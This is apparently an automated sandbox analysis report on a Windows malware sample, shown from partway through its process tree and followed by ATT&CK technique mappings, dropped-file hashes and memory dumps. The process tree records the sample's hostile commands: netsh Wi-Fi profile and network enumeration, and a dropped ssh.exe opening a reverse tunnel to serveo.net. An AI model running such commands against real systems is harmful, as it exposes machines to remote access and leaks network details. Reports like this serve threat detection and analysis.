      findstr /R /C:"[ ]:[ ]"
      4⤵
      PID:2600
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:1256
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2004
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:1968
  - - C:\Windows\system32\netsh.exe
      netsh wlan show networks mode=bssid
      4⤵
      PID:588
  - - C:\Windows\system32\findstr.exe
      findstr "SSID BSSID Signal"
      4⤵
      PID:864
- - C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
    "C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8661 serveo.net
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\.ssh\known_hosts

Filesize
393B

MD5
18015a60cd12f33648facec1263cfafa

SHA1
31b7afd9a2dc51bfad694e5772d430fceedbac3f

SHA256
9ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190

SHA512
fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
9243b84ee0e68751cc2c365baa4c29bc

SHA1
73ea73b428ab02b5594a35a236301381807be227

SHA256
741e53325f380864f1a841243c74b01b2466cc307a02bddfdf8d447e161b5dce

SHA512
ef36b7578f1651d187304a1c002d0619c6704cb8498a6c1921301661e5591eeb04523f815325b2be5438ba46c7f683ecca77602e57bd6e0fce8f571a3f73129e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
856e50bb01e48a10d2611fefcdbb6970

SHA1
0687754123604c49fd05d04a0088c785bf480fae

SHA256
4f581d760957eb1473f471fdfa12247fdcb0efd058df6dba78c42df1f1b56253

SHA512
d4298076759621744abc2b7990855b05df11a70b0a864c4fc44bacbf5b68b0979db0123ffad27e59b84ceebbee89fde21a717b169eb82392ca68e46b2e968072

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab9A10.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar9AAF.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

Filesize
1.5MB

MD5
79a6e2268dfdba1d94c27f4b17265ff4

SHA1
b17eed8cb6f454700f8bfcfd315d5627d3cf741c

SHA256
6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

SHA512
3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

Download Submit
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

Filesize
914KB

MD5
d1ce628a81ab779f1e8f7bf7df1bb32c

SHA1
011c90c704bb4782001d6e6ce1c647bf2bb17e01

SHA256
2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

SHA512
de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

Download Submit
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

Filesize
914KB

MD5
d1ce628a81ab779f1e8f7bf7df1bb32c

SHA1
011c90c704bb4782001d6e6ce1c647bf2bb17e01

SHA256
2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

SHA512
de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

Download Submit
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

Filesize
914KB

MD5
d1ce628a81ab779f1e8f7bf7df1bb32c

SHA1
011c90c704bb4782001d6e6ce1c647bf2bb17e01

SHA256
2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

SHA512
de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

Download Submit
C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

Filesize
53.4MB

MD5
a43b860d290321de53ed6deb5cae95af

SHA1
62cc70d91f7e39fc93b9b0f106f78a90cfc54047

SHA256
6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538

SHA512
535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

Download Submit
C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

Filesize
53.4MB

MD5
a43b860d290321de53ed6deb5cae95af

SHA1
62cc70d91f7e39fc93b9b0f106f78a90cfc54047

SHA256
6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538

SHA512
535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

Download Submit
C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

Filesize
53.4MB

MD5
a43b860d290321de53ed6deb5cae95af

SHA1
62cc70d91f7e39fc93b9b0f106f78a90cfc54047

SHA256
6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538

SHA512
535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

Download Submit
C:\Users\Admin\AppData\Local\w3bgb431s6\port.dat

Filesize
4B

MD5
919d2356219c1fa0c0bd560246532c72

SHA1
264be81b3a6dee19eb8b68a894d7050d94edf1a6

SHA256
ba64fc14ebb32368ef763cc24dfbabfaa7b23a3538bc0b8d3f1a690f281238df

SHA512
2021c12151f7cfd37898f1fb398c6a1d12c1053e43641234fd42319d83b27a079aa376c7d8ae20a9bd8eed608c2216157502abd5fde6a2257c1c5b1f8b73c22c

Download Submit
\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

Filesize
1.5MB

MD5
79a6e2268dfdba1d94c27f4b17265ff4

SHA1
b17eed8cb6f454700f8bfcfd315d5627d3cf741c

SHA256
6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

SHA512
3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

Download Submit
\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

Filesize
1.5MB

MD5
79a6e2268dfdba1d94c27f4b17265ff4

SHA1
b17eed8cb6f454700f8bfcfd315d5627d3cf741c

SHA256
6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

SHA512
3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

Download Submit
memory/2352-190-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

Filesize
9.9MB

Download
memory/2352-191-0x000000001B2A0000-0x000000001B320000-memory.dmp

Filesize
512KB

Download
memory/2352-215-0x000000001B2A0000-0x000000001B320000-memory.dmp

Filesize
512KB

Download
memory/2352-214-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

Filesize
9.9MB

Download
memory/2576-2-0x000000001B2E0000-0x000000001B360000-memory.dmp

Filesize
512KB

Download
memory/2576-1-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

Filesize
9.9MB

Download
memory/2576-5-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

Filesize
9.9MB

Download
memory/2576-0-0x0000000000210000-0x0000000000272000-memory.dmp

Filesize
392KB

Download
memory/2616-10-0x0000000000CD0000-0x0000000000D32000-memory.dmp

Filesize
392KB

Download
memory/2616-127-0x0000000000470000-0x00000000004F0000-memory.dmp

Filesize
512KB

Download
memory/2616-126-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

Filesize
9.9MB

Download
memory/2616-11-0x0000000000470000-0x00000000004F0000-memory.dmp

Filesize
512KB

Download
memory/2616-9-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

Filesize
9.9MB

Download